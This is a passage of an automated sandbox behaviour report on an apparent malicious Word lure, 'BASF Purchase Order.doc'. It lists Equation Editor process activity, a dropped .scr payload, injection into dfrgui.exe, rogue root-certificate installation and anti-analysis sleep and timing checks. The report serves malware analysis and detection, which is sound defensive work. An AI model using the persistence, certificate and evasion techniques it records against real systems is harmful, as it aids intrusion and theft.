Source: C:\Windows\SysWOW64\dfrgui.exe	Section loaded: wdscore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Section loaded: cryptui.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Section loaded: riched32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: msi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\dfrgui.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Jump to behavior

Source: BASF Purchase Order.LNK.0.dr

LNK file: ..\..\..\..\..\Desktop\BASF Purchase Order.doc

Source: C:\Users\user\AppData\Roaming\sharon48399.scr

File opened: C:\Windows\SysWOW64\MsftEdit.DLL

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Roaming\sharon48399.scr

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: C:\Users\GT350\source\repos\UpdatedRunpe\UpdatedRunpe\obj\x86\Debug\AQipUvwTwkLZyiCs.pdb source: sharon48399.scr, 00000005.00000002.362295596.0000000000660000.00000004.08000000.00040000.00000000.sdmp, sharon48399.scr, 00000005.00000002.362383044.0000000002211000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dfrgui.pdb source: sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe, 00000007.00000003.392759553.0000000000220000.00000004.00000001.00020000.00000000.sdmp, sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe, 00000007.00000003.392886673.0000000001E20000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe, 00000007.00000002.878300165.000000000030E000.00000002.00000001.01000000.00000009.sdmp, sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe, 0000000C.00000002.878328995.000000000030E000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: dfrgui.pdb2D source: sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe, 00000007.00000003.392759553.0000000000220000.00000004.00000001.00020000.00000000.sdmp, sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe, 00000007.00000003.392886673.0000000001E20000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: sharon48399.scr, sharon48399.scr, 00000006.00000002.405877611.0000000000C00000.00000040.00001000.00020000.00000000.sdmp, dfrgui.exe, 00000008.00000003.405822368.0000000001F50000.00000004.00000020.00020000.00000000.sdmp, dfrgui.exe, 00000008.00000003.406160748.00000000020B0000.00000004.00000020.00020000.00000000.sdmp, dfrgui.exe, 00000008.00000002.878528126.00000000023C0000.00000040.00001000.00020000.00000000.sdmp, dfrgui.exe, 00000008.00000002.878528126.0000000002240000.00000040.00001000.00020000.00000000.sdmp

Source: sharon[1].scr.2.dr

Static PE information: 0xF9F1620A [Sun Nov 19 02:20:58 2102 UTC]

Source: sqlite3.dll.8.dr	Static PE information: section name: /4
Source: sqlite3.dll.8.dr	Static PE information: section name: /19
Source: sqlite3.dll.8.dr	Static PE information: section name: /31
Source: sqlite3.dll.8.dr	Static PE information: section name: /45
Source: sqlite3.dll.8.dr	Static PE information: section name: /57
Source: sqlite3.dll.8.dr	Static PE information: section name: /70
Source: sqlite3.dll.8.dr	Static PE information: section name: /81
Source: sqlite3.dll.8.dr	Static PE information: section name: /92

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0055A348 push eax; retn 0055h	2_2_0055A349
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0054F6C3 push eax; iretd	2_2_0054F6C4
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_005501F4 push eax; retf	2_2_005501F5
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_0041B855 pushad ; iretd	6_2_0041B884
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00407936 push eax; iretd	6_2_00407937
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_004191E7 push ecx; ret	6_2_004191E8
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00415A7A push esi; retf	6_2_00415AB4
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_0040EB41 push 7B0B5DBBh; iretd	6_2_0040EB4A
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_0042F3B2 push eax; ret	6_2_0042F3B4
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00419C00 pushad ; retf	6_2_00419C2D
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00415C3E push esp; retf	6_2_00415C8E
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00403640 push eax; ret	6_2_00403642
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_0041F75D push eax; iretd	6_2_0041F75E
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Code function: 6_2_00C1DFA1 push ecx; ret	6_2_00C1DFB4

Source: sharon[1].scr.2.dr	Static PE information: section name: .text entropy: 7.332650733062575
Source: sharon48399.scr.2.dr	Static PE information: section name: .text entropy: 7.332650733062575

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\sharon[1].scr			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\sharon48399.scr			Jump to dropped file

Installs new ROOT certificates

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob	Jump to behavior

Source: C:\Windows\SysWOW64\dfrgui.exe	File created: C:\Users\user\AppData\Local\Temp\sqlite3.dll	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\sharon[1].scr	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\sharon48399.scr	Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Memory allocated: 1D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Memory allocated: 2210000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon48399.scr	Memory allocated: 5A0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\AppData\Roaming\sharon48399.scr

Code function: 6_2_00C60101 rdtsc

6_2_00C60101

Source: C:\Users\user\AppData\Roaming\sharon48399.scr

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\SysWOW64\dfrgui.exe

Window / User API: threadDelayed 9787

Jump to behavior

Source: C:\Windows\SysWOW64\dfrgui.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\sqlite3.dll

Jump to dropped file

Source: C:\Windows\SysWOW64\dfrgui.exe

API coverage: 2.1 %

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2944	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sharon48399.scr TID: 976	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe TID: 1520	Thread sleep count: 170 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe TID: 1520	Thread sleep time: -340000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe TID: 2572	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe TID: 1520	Thread sleep count: 9787 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\dfrgui.exe TID: 1520	Thread sleep time: -19574000s >= -30000s	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 652	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe TID: 1648	Thread sleep time: -75000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe TID: 1648	Thread sleep count: 39 > 30	Jump to behavior
Source: C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe TID: 1648	Thread sleep time: -39000s >= -30000s	Jump to behavior
